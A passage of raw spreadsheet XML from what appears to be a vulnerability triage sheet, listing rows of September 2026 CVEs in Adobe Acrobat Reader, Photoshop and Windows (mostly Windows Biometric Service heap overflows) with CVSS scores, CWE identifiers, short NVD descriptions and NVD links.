adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L667" s="5" t="inlineStr" /><c r="M667" s="5" t="inlineStr" /><c r="N667" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O667" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P667" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q667" s="5" t="inlineStr" /><c r="R667" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S667" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T667" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81990</t></is></c></row><row r="668"><c r="A668" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B668" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C668" s="5" t="inlineStr"><is><t>CVE-2026-81992</t></is></c><c r="D668" s="5" t="n"><v>7.8</v></c><c r="E668" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F668" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G668" s="5" t="inlineStr" /><c r="H668" s="5" t="n"><v>0.002</v></c><c r="I668" s="5" t="inlineStr" /><c r="J668" s="5" t="inlineStr" /><c r="K668" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L668" s="5" t="inlineStr" /><c r="M668" s="5" t="inlineStr" /><c r="N668" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P668" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q668" s="5" t="inlineStr" /><c r="R668" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S668" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T668" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81992</t></is></c></row><row r="669"><c r="A669" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B669" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C669" s="5" t="inlineStr"><is><t>CVE-2026-82005</t></is></c><c r="D669" s="5" t="n"><v>7.8</v></c><c r="E669" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F669" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G669" s="5" t="inlineStr" /><c r="H669" s="5" t="n"><v>0.002</v></c><c r="I669" s="5" t="inlineStr" /><c r="J669" s="5" t="inlineStr" /><c r="K669" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L669" s="5" t="inlineStr" /><c r="M669" s="5" t="inlineStr" /><c r="N669" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P669" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q669" s="5" t="inlineStr" /><c r="R669" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S669" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T669" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82005</t></is></c></row><row r="670"><c r="A670" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B670" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C670" s="5" t="inlineStr"><is><t>CVE-2026-82006</t></is></c><c r="D670" s="5" t="n"><v>7.8</v></c><c r="E670" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F670" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G670" s="5" t="inlineStr" /><c r="H670" s="5" t="n"><v>0.002</v></c><c r="I670" s="5" t="inlineStr" /><c r="J670" s="5" t="inlineStr" /><c r="K670" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L670" s="5" t="inlineStr" /><c r="M670" s="5" t="inlineStr" /><c r="N670" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P670" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q670" s="5" t="inlineStr" /><c r="R670" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S670" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T670" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82006</t></is></c></row><row r="671"><c r="A671" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B671" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C671" s="5" t="inlineStr"><is><t>CVE-2026-82007</t></is></c><c r="D671" s="5" t="n"><v>7.8</v></c><c r="E671" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F671" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G671" s="5" t="inlineStr" /><c r="H671" s="5" t="n"><v>0.002</v></c><c r="I671" s="5" t="inlineStr" /><c r="J671" s="5" t="inlineStr" /><c r="K671" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L671" s="5" t="inlineStr" /><c r="M671" s="5" t="inlineStr" /><c r="N671" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O671" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P671" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q671" s="5" t="inlineStr" /><c r="R671" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S671"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71" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82007</t></is></c></row><row r="672"><c r="A672" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B672" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C672" s="5" t="inlineStr"><is><t>CVE-2026-83498</t></is></c><c r="D672" s="5" t="n"><v>7.8</v></c><c r="E672" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F672" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G672" s="5" t="inlineStr" /><c r="H672" s="5" t="n"><v>0.003</v></c><c r="I672" s="5" t="inlineStr" /><c r="J672" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K672" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L672" s="5" t="inlineStr" /><c r="M672" s="5" t="inlineStr" /><c r="N672" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P672" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q672" s="5" t="inlineStr" /><c r="R672" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S672" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T672" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t></is></c></row><row r="673"><c r="A673" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B673" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C673" s="5" t="inlineStr"><is><t>CVE-2026-83942</t></is></c><c r="D673" s="5" t="n"><v>7.8</v></c><c r="E673" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F673" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G673" s="5" t="inlineStr" /><c r="H673" s="5" t="n"><v>0.002</v></c><c r="I673" s="5" t="inlineStr" /><c r="J673" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K673"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673" s="5" t="inlineStr" /><c r="M673" s="5" t="inlineStr" /><c r="N673" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P673" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q673" s="5" t="inlineStr" /><c r="R673" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S673" s="5" t="inlineStr"><is><t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T673" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t></is></c></row><row r="674"><c r="A674" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B674" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C674" s="5" t="inlineStr"><is><t>CVE-2026-83952</t></is></c><c r="D674" s="5" t="n"><v>7.8</v></c><c r="E674" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F674" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G674" s="5" t="inlineStr" /><c r="H674" s="5" t="n"><v>0.002</v></c><c r="I674" s="5" t="inlineStr" /><c r="J674" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K674" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L674" s="5" t="inlineStr" /><c r="M674" s="5" t="inlineStr" /><c r="N674" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O674" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P674" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q674" s="5" t="inlineStr" /><c r="R674" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S674" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T674" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t></is></c></row><row r="675"><c r="A675" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B675" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C675" s="5" t="inlineStr"><is><t>CVE-2026-83954</t></is></c><c r="D675" s="5" t="n"><v>7.8</v></c><c r="E675" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F675" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G675" s="5" t="inlineStr" /><c r="H675" s="5" t="n"><v>0.003</v></c><c r="I675" s="5" t="inlineStr" /><c r="J675" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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5" s="5" t="inlineStr" /><c r="M675" s="5" t="inlineStr" /><c r="N675" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O675" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P675" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q675" s="5" t="inlineStr" /><c r="R675" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S675" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T675" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t></is></c></row><row r="676"><c r="A676" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B676" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C676" s="5" t="inlineStr"><is><t>CVE-2026-83955</t></is></c><c r="D676" s="5" t="n"><v>7.8</v></c><c r="E676" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F676" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G676" s="5" t="inlineStr" /><c r="H676" s="5" t="n"><v>0.002</v></c><c r="I676" s="5" t="inlineStr" /><c r="J676" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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6" s="5" t="inlineStr" /><c r="M676" s="5" t="inlineStr" /><c r="N676" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O676" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P676" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q676" s="5" t="inlineStr" /><c r="R676" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S676" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T676" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t></is></c></row><row r="677"><c r="A677" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B677" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C677" s="5" t="inlineStr"><is><t>CVE-2026-83967</t></is></c><c r="D677" s="5" t="n"><v>7.8</v></c><c r="E677" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F677" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G677" s="5" t="inlineStr" /><c r="H677" s="5" t="n"><v>0.003</v></c><c r="I677" s="5" t="inlineStr" /><c r="J677" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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7" s="5" t="inlineStr" /><c r="M677" s="5" t="inlineStr" /><c r="N677" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O677" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P677" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q677" s="5" t="inlineStr" /><c r="R677" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S677" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T677" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t></is></c></row><row r="678"><c r="A678" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B678" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C678" s="5" t="inlineStr"><is><t>CVE-2026-83968</t></is></c><c r="D678" s="5" t="n"><v>7.8</v></c><c r="E678" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F678" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G678" s="5" t="inlineStr" /><c r="H678" s="5" t="n"><v>0.003</v></c><c r="I678" s="5" t="inlineStr" /><c r="J678" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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8" s="5" t="inlineStr" /><c r="M678" s="5" t="inlineStr" /><c r="N678" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O678" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P678" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q678" s="5" t="inlineStr" /><c r="R678" s="5" t="inlineStr"><is><t>CWE-400, CWE-416</t></is></c><c r="S678" s="5" t="inlineStr"><is><t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T678" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t></is></c></row><row r="679"><c r="A679" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B679" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C679" s="5" t="inlineStr"><is><t>CVE-2026-83969</t></is></c><c r="D679" s="5" t="n"><v>7.8</v></c><c r="E679" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F679" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G679" s="5" t="inlineStr" /><c r="H679" s="5" t="n"><v>0.002</v></c><c r="I679" s="5" t="inlineStr" /><c r="J679" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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9" s="5" t="inlineStr" /><c r="M679" s="5" t="inlineStr" /><c r="N679" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O679" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P679" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q679" s="5" t="inlineStr" /><c r="R679" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S679" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T679" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t></is></c></row><row r="680"><c r="A680" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B680" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C680" s="5" t="inlineStr"><is><t>CVE-2026-83970</t></is></c><c r="D680" s="5" t="n"><v>7.8</v></c><c r="E680" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F680" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G680" s="5" t="inlineStr" /><c r="H680" s="5" t="n"><v>0.003</v></c><c r="I680" s="5" t="inlineStr" /><c r="J680" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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0" s="5" t="inlineStr" /><c r="M680" s="5" t="inlineStr" /><c r="N680" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O680" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P680" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q680" s="5" t="inlineStr" /><c r="R680" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S680" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T680" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t></is></c></row><row r="681"><c r="A681" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B681" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C681" s="5" t="inlineStr"><is><t>CVE-2026-83971</t></is></c><c r="D681" s="5" t="n"><v>7.8</v></c><c r="E681" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F681" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G681" s="5" t="inlineStr" /><c r="H681" s="5" t="n"><v>0.003</v></c><c r="I681" s="5" t="inlineStr" /><c r="J681" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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1" s="5" t="inlineStr" /><c r="M681" s="5" t="inlineStr" /><c r="N681" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O681" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P681" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q681" s="5" t="inlineStr" /><c r="R681" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S681" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T681" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t></is></c></row><row r="682"><c r="A682" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B682" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C682" s="5" t="inlineStr"><is><t>CVE-2026-83972</t></is></c><c r="D682" s="5" t="n"><v>7.8</v></c><c r="E682" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F682" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G682" s="5" t="inlineStr" /><c r="H682" s="5" t="n"><v>0.003</v></c><c r="I682" s="5" t="inlineStr" /><c r="J682" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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2" s="5" t="inlineStr" /><c r="M682" s="5" t="inlineStr" /><c r="N682" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O682" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P682" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q682" s="5" t="inlineStr" /><c r="R682" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S682" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T682" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t></is></c></row><row r="683"><c r="A683" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B683" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C683" s="5" t="inlineStr"><is><t>CVE-2026-83973</t></is></c><c r="D683" s="5" t="n"><v>7.8</v></c><c r="E683" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F683" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G683" s="5" t="inlineStr" /><c r="H683" s="5" t="n"><v>0.003</v></c><c r="I683" s="5" t="inlineStr" /><c r="J683" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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3" s="5" t="inlineStr" /><c r="M683" s="5" t="inlineStr" /><c r="N683" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O683" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P683" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q683" s="5" t="inlineStr" /><c r="R683" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S683" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T683" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t></is></c></row><row r="684"><c r="A684" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B684" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C684" s="5" t="inlineStr"><is><t>CVE-2026-83974</t></is></c><c r="D684" s="5" t="n"><v>7.8</v></c><c r="E684" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F684" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G684" s="5" t="inlineStr" /><c r="H684" s="5" t="n"><v>0.002</v></c><c r="I684" s="5" t="inlineStr" /><c r="J684" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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4" s="5" t="inlineStr" /><c r="M684" s="5" t="inlineStr" /><c r="N684" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O684" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P684" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q684" s="5" t="inlineStr" /><c r="R684" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S684" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T684" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t></is></c></row><row r="685"><c r="A685" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B685" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C685" s="5" t="inlineStr"><is><t>CVE-2026-83975</t></is></c><c r="D685" s="5" t="n"><v>7.8</v></c><c r="E685" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F685" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G685" s="5" t="inlineStr" /><c r="H685" s="5" t="n"><v>0.003</v></c><c r="I685" s="5" t="inlineStr" /><c r="J685" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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5" s="5" t="inlineStr" /><c r="M685" s="5" t="inlineStr" /><c r="N685" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O685" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P685" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q685" s="5" t="inlineStr" /><c r="R685" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S685" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T685" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t></is></c></row><row r="686"><c r="A686" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B686" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C686" s="5" t="inlineStr"><is><t>CVE-2026-83976</t></is></c><c r="D686" s="5" t="n"><v>7.8</v></c><c r="E686" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F686" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G686" s="5" t="inlineStr" /><c r="H686" s="5" t="n"><v>0.002</v></c><c r="I686" s="5" t="inlineStr" /><c r="J686" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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6" s="5" t="inlineStr" /><c r="M686" s="5" t="inlineStr" /><c r="N686" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O686" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P686" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q686" s="5" t="inlineStr" /><c r="R686" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S686" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T686" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t></is></c></row><row r="687"><c r="A687" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B687" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C687" s="5" t="inlineStr"><is><t>CVE-2026-83977</t></is></c><c r="D687" s="5" t="n"><v>7.8</v></c><c r="E687" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F687" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G687" s="5" t="inlineStr" /><c r="H687" s="5" t="n"><v>0.003</v></c><c r="I687" s="5" t="inlineStr" /><c r="J687" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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7" s="5" t="inlineStr" /><c r="M687" s="5" t="inlineStr" /><c r="N687" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O687" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P687" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q687" s="5" t="inlineStr" /><c r="R687" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S687" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T687" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t></is></c></row><row r="688"><c r="A688" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B688" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C688" s="5" t="inlineStr"><is><t>CVE-2026-83978</t></is></c><c r="D688" s="5" t="n"><v>7.8</v></c><c r="E688" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F688" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G688" s="5" t="inlineStr" /><c r="H688" s="5" t="n"><v>0.003</v></c><c r="I688" s="5" t="inlineStr" /><c r="J688" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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8" s="5" t="inlineStr" /><c r="M688" s="5" t="inlineStr" /><c r="N688" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O688" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P688" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q688" s="5" t="inlineStr" /><c r="R688" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S688" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T688" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t></is></c></row><row r="689"><c r="A689" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B689" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C689" s="5" t="inlineStr"><is><t>CVE-2026-83979</t></is></c><c r="D689" s="5" t="n"><v>7.8</v></c><c r="E689" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F689" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G689" s="5" t="inlineStr" /><c r="H689" s="5" t="n"><v>0.003</v></c><c r="I689" s="5" t="inlineStr" /><c r="J689" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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9" s="5" t="inlineStr" /><c r="M689" s="5" t="inlineStr" /><c r="N689" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O689" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P689" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q689" s="5" t="inlineStr" /><c r="R689" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S689" s="5" t="inlineStr"><is><t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T689" s="6" 